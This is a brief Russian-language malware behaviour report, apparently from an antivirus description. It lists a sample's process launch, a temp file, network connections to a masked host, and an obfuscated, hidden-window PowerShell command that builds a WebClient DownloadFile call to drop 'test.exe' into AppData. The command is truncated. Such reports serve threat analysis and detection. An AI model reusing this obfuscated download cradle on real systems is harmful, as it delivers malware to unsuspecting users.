Техническая информация
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\1162909.cvr
- 'fi##bin.net':443
- 'fi##bin.net':443
- DNS ASK fi##bin.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $MMMMMM='C:\Users\'+ $env:UserNaMe +'\AppData\test.exe';((n`e`W`-obj`e`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'F'+'i'+'l'+'e')).invoke(((...' (со скрытым окном)